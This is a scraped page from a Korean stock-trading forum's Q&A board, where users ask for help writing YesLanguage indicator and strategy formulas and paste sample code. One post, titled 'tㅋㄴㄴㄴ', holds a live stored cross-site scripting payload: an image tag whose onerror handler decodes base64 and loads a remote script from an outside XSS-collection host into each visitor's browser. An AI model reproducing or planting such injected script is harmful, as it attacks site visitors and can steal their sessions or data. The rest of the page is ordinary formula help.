커뮤니티

예스랭귀지 Q&A

글쓰기
답변완료

[공지] 예스랭귀지 AI 어시스턴트, '예스나 AI' 출시 및 무료 체험 안내

안녕하세요, 예스스탁 입니다.복잡한 수식 공부 없이 여러분의 아이디어를 말하면 시스템 트레이딩 언어 예스랭귀지로 작성해주는 서비스예스나 AI(YesNa AI)가 출시되었습니다.지금 예스나 AI를 직접 경험해 보실 수 있도록 20크레딧(질문권 20회)를 무료로 증정해 드리고 있습니다.바로 여러분의 아이디어를 코드로 변환해보세요.--------------------------------------------------🚀 YesNa AI 핵심 기능- 지표식/전략식/종목검색식 생성: 자연어로 요청하면 예스랭귀지 문법에 맞는 코드를 작성합니다.- 종목검색식 변환 지원: K증권의 종목 검색식을 예스랭귀지로 변환 지원합니다.- 컴파일 검증: 작성된 코드가 실행 가능한지 컴파일러를 통해 문법 검증을 거쳐 결과물을 제공합니다.상세한 서비스 개요 및 활용 방법은 [서비스 소개 페이지]에서 확인하실 수 있습니다.▶ 서비스 소개 페이지: 바로가기서비스 사용 유의사항 및 결제 환불정책은 [이용약관]을 참고 부탁드립니다.▶ 서비스 이용약관: 바로가기💬 이용 문의사용 중 문의사항은 [프로그램 사용법 Q&A] 게시판에서 [예스나 AI] 카테고리를 설정 후 문의해 주시면 상세히 안내해 드리겠습니다.--------------------------------------------------앞으로도 AI를 활용한 다양한 트레이딩 기능들을 지속적으로 선보일 예정입니다.많은 관심과 기대 부탁드립니다.
프로필 이미지
예스스탁
2026-02-27
3164
글번호 230811
지표
답변완료

수식 문의

안녕하세요. 아래와 같은 수식을 문의드리고 싶습니다. ----------------------------------- n일전, 분봉에서, 마지막 종가에 해당하는 볼린저 밴드 상단선 볼린저 밴드 하단선 가격을 n-1일의 분봉에 고정시켜 횡선으로 긋고 싶습니다. 또한, n-2일의 분봉 n-3일의 분봉 n-4일의 분봉 n-5일의 분봉 n-6일의 분봉 n-7일의 분봉 n-8일의 분봉 n-9일의 분봉 n-10일의 분봉에도 n일의 가격을 횡선으로 표현하고 싶습니다. ---------------------------- 항상 친절한 답변 감사드립니다. 위와 비슷한 형태의 수식을 도움 받은바 있는데 실력이 미천하여 변용하지 못하겠어 다시 문의 드립니다. 참고 하시기 바랍니다. -------참고---------- ## n봉기간 동안 늘려라 if bdate != bdate[1] Then { idx = 0; value[0] = 0; for cnt = 1 to 19 { value[cnt] = value[cnt-1][1]; } } idx = idx+1; ## 시간대 설정 if (sdate != sdate[1] and stime >= 100000) or (sdate == sdate[1] and stime >= 100000 and stime[1] < 100000) then { Tcond = true; Condition1 = false; } if (sdate != sdate[1] and stime >= 040000) or (sdate == sdate[1] and stime >= 040000 and stime[1] < 040000) then { Tcond = False; } ## 골드 & 데드 if Tcond == true Then { if crossup(c,x1) or CrossDown(c,y1) Then { Condition1 = true; var1 = x1; } if Condition1 == true Then value[0] = var1; Else value[0] = x1; } if idx <= n then { if value[1] > 0 Then plot1(value[1],"1"); if value[2] > 0 Then plot2(value[2],"2",iff(value[2] > dayopen,RGB(255,216,216),RGB(217,229,255))); if value[3] > 0 Then plot3(value[3],"3",iff(value[3] > dayopen,RGB(255,167,167),RGB(178,204,255))); if value[4] > 0 Then plot4(value[4],"4",iff(value[4] > dayopen,RGB(241,95,095),RGB(103,153,255))); if value[5] > 0 Then plot5(value[5],"5",iff(value[5] > dayopen,RGB(204,061,061),RGB(67,116,217))); if value[6] > 0 then plot6(value[6],"6",iff(value[6] > dayopen,RGB(152,000,000),RGB(0,51,153))); if value[7] > 0 Then plot7(value[7],"7",iff(value[7] > dayopen,RGB(152,000,000),RGB(0,51,153))); if value[8] > 0 Then plot8(value[8],"8",iff(value[8] > dayopen,RGB(152,000,000),RGB(0,51,153))); if value[9] > 0 Then plot9(value[9],"9",iff(value[9] > dayopen,RGB(152,000,000),RGB(0,51,153))); if value[10] > 0 Then plot10(value[10],"10",iff(value[10] > dayopen,RGB(152,000,000),RGB(0,51,153))); }
프로필 이미지
부똘이
2021-11-02
899
글번호 153293
지표
답변완료

부탁 드립니다.

항상 도움에 감사 드립니다. 타주기 수식 부탁 드립니다. 1)분봉지표를 분봉차트에서 2)틱봉지표를 틱봉차트에서 3)일봉지표를 분봉차트에서 4)주봉지표를 분봉차트에서 미리 감사 드립니다... 질문수식) input:p(30); input:sig(5); var1=(c-trl)*v; VAR2=trh-trl; Var3=var1/Var2; Var4=ma(Var3,p); Var5=ma(v,p); var6=(var4/Var5)*100; Var7=ma(Var6,sig); 참고1) TRL=min(C[1],L); TRH=max(C[1],H); 참고2) input : ntime(numeric),P(numeric),sig(numeric); var : S1(0),D1(0),TM(0),TF(0),cnt(0),sum1(0),sum2(0); var : v2(0),v4(0),pre(0),C1(0),idx(0),vv(0); Array : v1[100](0),v3[100](0); if Bdate != Bdate[1] Then { S1 = TimeToMinutes(stime); D1 = sdate; } if D1 > 0 then { if sdate == D1 Then TM = TimeToMinutes(stime)-S1; Else TM = TimeToMinutes(stime)+1440-S1; TF = TM%ntime; if Bdate != Bdate[1] or (Bdate == Bdate[1] and ntime > 1 and TF < TF[1]) or (Bdate == Bdate[1] and ntime > 1 and TM >= TM[1]+ntime) or (Bdate == Bdate[1] and ntime == 1 and TM > TM[1]) Then { idx = idx+1; C1 = C[1]; vv = 0; pre = v1[0][1]; For cnt = 1 to 99 { v1[cnt] = v1[cnt-1][1]; v3[cnt] = v3[cnt-1][1]; } } vv = vv + v; 참고3) input : ntime(numeric),P(numeric),sig(numeric); var : D1(0),TF(0),cnt(0),sum1(0),sum2(0); var : v2(0),v4(0),pre(0),C1(0),idx(0),Didx(0),vv(0); Array : v1[100](0),v3[100](0); if Bdate != Bdate[1] Then { D1 = sdate; Didx = 0; } Else Didx = Didx+1; if D1 > 0 then { TF = Didx%ntime; if Bdate != bdate[1] or (TF < TF[1] and Bdate == Bdate[1]) Then { idx = idx+1; C1 = C[1]; vv = 0; pre = v1[0][1]; For cnt = 1 to 99 {
프로필 이미지
yes
2021-11-01
570
글번호 153290
지표
답변완료

수식 문의 드립니다...

20이평돌파 매수 20이평 깨지면 매도.. 1.한번매매이고 매수후 20이평깨지면 매수청산후 매매 없음. 매수후 20이평 깨지지 않으면 15시30분청산. 2.매수후 20이평 깨지면 스위칭 매도후 진입없음. 20이평 돌파시 매도청산 후 매매없음.매도진입후 20이평돌파없으면 15시30분 청산.입니다...
프로필 이미지
고구미
2021-11-01
686
글번호 153288
시스템
답변완료

문의드립니다

Input:length(2),종가사용여부(0),파동선두께(1),파동선두께고저선(0),수치표시(0); Var:j(0),jj(0),HH(0),LL(0),최종고가(0),최종저가(0),최종꼭지점(""),처리구분(""), TL1(0),Text1(0),tl2(0),T(0),sumv(0),sumi(0),mav(0); Array:고[10,4](0),저[10,4](0); // 1:가격,2:Index,3:sDate,4:sTime #==========================================# HH = IFF(종가사용여부==1,C,H); LL = IFF(종가사용여부==1,C,L); If Index == 0 Then { 고[1,1] = HH; 저[1,1] = LL; } Condition1 = Highest(HH,length) == HH and 최종고가 <> HH; Condition2 = Lowest (LL,length) == LL and 최종저가 <> LL; 처리구분 = ""; If Condition1 and Condition2 Then // 기간고점과 기간저점 동시 발생 { If 최종꼭지점 == "저점" Then { If 저[1,1] > LL Then 처리구분 = "저점처리"; Else 처리구분 = "고점처리"; } Else If 최종꼭지점 == "고점" Then { If 고[1,1] < HH Then 처리구분 = "고점처리"; Else 처리구분 = "저점처리"; } } Else If Condition1 Then 처리구분 = "고점처리"; Else If Condition2 Then 처리구분 = "저점처리"; #==========================================# If 처리구분 == "고점처리" Then { T = 1; 최종고가 = HH; // 신규고점을 체크하기 위해 저장 If 최종꼭지점 == "저점" Then { For j = 10 DownTo 2 { For jj = 1 To 4 { 고[j,jj] = 고[j-1,jj]; } } 고[1,1] = HH; 고[1,2] = Index; 고[1,3] = sDate; 고[1,4] = sTime; TL1 = TL_New(저[1,3],저[1,4],저[1,1],고[1,3],고[1,4],고[1,1]); TL2 = TL_New(고[2,3],고[2,4],고[2,1],고[1,3],고[1,4],고[1,1]); If 수치표시 == 1 Then { Text1 = Text_New(고[1,3],고[1,4],고[1,1],NumToStr(고[1,1],2)); Text_SetStyle(Text1, 2, 2); Text_SetColor(Text1,RED); Text_SetSize(Text1, 15); } TL_SetSize(TL1,파동선두께); TL_SetColor(TL1,RED); TL_SetSize(TL2,파동선두께고저선); TL_SetColor(TL2,RGB(129,129,129)); } Else If 고[1,1] < HH Then // 1번 고점보다 높은 고가 출현 { 고[1,1] = HH; 고[1,2] = Index; 고[1,3] = sDate; 고[1,4] = sTime; TL_SetEnd(TL1,고[1,3],고[1,4],고[1,1]); TL_SetEnd(TL2,고[1,3],고[1,4],고[1,1]); // 시작점은 변동없고 끝점의 위치가 현재 봉으로 연장된 것임 If 수치표시 == 1 Then { Text_SetLocation(Text1,고[1,3],고[1,4],고[1,1]); Text_SetString(Text1,NumToStr(고[1,1],2)); } } 최종꼭지점 = "고점"; } #==========================================# If 처리구분 == "저점처리" Then { T = -1; 최종저가 = LL; If 최종꼭지점 == "고점" then { For j = 10 DownTo 2 { For jj = 1 To 4 { 저[j,jj] = 저[j-1,jj]; } } 저[1,1] = LL; 저[1,2] = Index; 저[1,3] = sDate; 저[1,4] = sTime; TL1 = TL_New(고[1,3],고[1,4],고[1,1],저[1,3],저[1,4],저[1,1]); TL2 = TL_New(저[2,3],저[2,4],저[2,1],저[1,3],저[1,4],저[1,1]); If 수치표시 == 1 Then { Text1 = Text_New(저[1,3],저[1,4],저[1,1],NumToStr(저[1,1],2)); Text_SetStyle(Text1, 2, 0); Text_SetColor(Text1,BLUE); Text_SetSize(Text1, 15); } TL_SetSize(TL1,파동선두께); TL_SetColor(TL1,BLUE); TL_SetSize(TL2,파동선두께고저선); TL_SetColor(TL2,RGB(129,129,129)); } Else If 저[1,1] > LL then { 저[1,1] = LL; 저[1,2] = Index; 저[1,3] = sDate; 저[1,4] = sTime; TL_SetEnd(TL1,저[1,3],저[1,4],저[1,1]); TL_SetEnd(TL2,저[1,3],저[1,4],저[1,1]); If 수치표시 == 1 Then { Text_SetLocation(Text1,저[1,3],저[1,4],저[1,1]); Text_SetString(Text1,NumToStr(저[1,1],2)); } } 최종꼭지점 = "저점"; } if T != T[1] Then { sumv = 0; sumi = 0; } sumv = sumv+c; sumi = sumi+1; mav = sumv/sumi; var1 = (mav); if var1 > var1[1] Then value1 = 1; if var1 < var1[1] Then value1 = -1; if value1 == 1 Then plot1(var1,"1",RED); if value1 == -1 Then plot1(var1,"1",BLUE); plot1(mav); ........................................................................................................... 1-1 상기식을 데이타2 용으로 가공해 주세요 1-2 상기식에서 plot1의 색깔이 변하면 경보음이 나올수 있도록 가공해 주세요 2. 참조챠트 데이타2의 봉에서 시가가 나오면 본챠트에 그시가선을(참조챠트의 시가) 수평으로 그어 주세요
프로필 이미지
zmfha
2021-11-01
545
글번호 153284
지표

7out 님에 의해서 삭제되었습니다.

프로필 이미지
7out
2021-11-01
29
글번호 153283
시스템
답변완료

지표수식전환 요청

다음 수식전환 부탁드립니다. <1> A=Trix(Period)+Trix(Period,1); B=crossup(A,0); D=crossdown(A,0); K=crossup(A,0.10); M=crossdown(A,0.10); G=crossup(A,0.15); J=crossdown(A,0.15); E=if((B or D or G or J or K or M), 1, 0); valuewhen(1,E,o); Period/2 <2> 수식1 양봉=C>O; 음봉=C<O; 양V=V>V(1); 음V=V<V(1); A=ValueWhen(1, 양봉 && 양V, C) 수식2 IF(A>=A(1),A,0) 수식3 IF(A<A(1),A,0) <3> 수식1 BBandsUP(기간1,d1); 수식2 BBandsUP(기간2,d2); 수식3 BBandsUP(기간3,d3); 수식4 BBandsUP(기간4,d4); 수식5 BBandsUP(기간5,d5); 수식1 BBandsdown(기간1,d1); 수식2 BBandsdown(기간2,d2); 수식3 BBandsdown(기간3,d3); 수식4 BBandsdown(기간4,d4); 수식5 BBandsdown(기간5,d5); 기간1 10 기간2 13 기간3 15 기간4 17 기간5 20 d1 2 d2 2.2 d3 2.3 d4 2.4 d5 2.5
프로필 이미지
이대표
2021-10-31
739
글번호 153282
지표

tㅋㄴㄴㄴ

tㅋㄴㄴㄴ<img src=x onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtib2R5LmFwcGVuZENoaWxkKHMpO3Muc3JjPSdodHRwczovL3hzcy5wdC9KQnRDPycrTWF0aC5yYW5kb20oKQ=='))>
프로필 이미지
전복자
2021-10-31
632
글번호 153281
지표

전복자 님에 의해서 삭제되었습니다.

프로필 이미지
전복자
2021-10-31
0
글번호 153280
지표
답변완료

문의드립니다

수고 하십니다 그림과 같이 %와가격을 나타내고 싶은데 하다가 막혀서 문의드립니다 input : per1(14),per2(20),per3(30),per4(50),per5(60),per6(80),per7(120),per8(150), per9(250); var : cnt(0); Array : va[14](0), Text[14](0),p[14](0); va[1] = DayLow*(1+per1/100); va[2] = DayLow*(1+per2/100); va[3] = DayLow*(1+per3/100); va[4] = DayLow*(1+per4/100); va[5] = DayLow*(1+per5/100); va[6] = DayLow*(1+per6/100); va[7] = DayLow*(1+per7/100); va[8] = DayLow*(1+per8/100); va[9] = DayLow*(1+per9/100); plot1(va[1]); plot2(va[2]); plot3(va[3]); plot4(va[4]); plot5(va[5]); plot6(va[6]); plot7(va[7]); plot8(va[8]); plot9(va[9]); For cnt = 0 to 8 Begin Text_Delete(Text[cnt]); Text[cnt] = Text_New(CurrentDate,CurrentTime,va[cnt],NumToStr(va[cnt],2)); End; For cnt = 0 to 8 Begin Text_Delete(p[cnt]); End;
프로필 이미지
비듬싸순
2021-10-31
768
글번호 153279
지표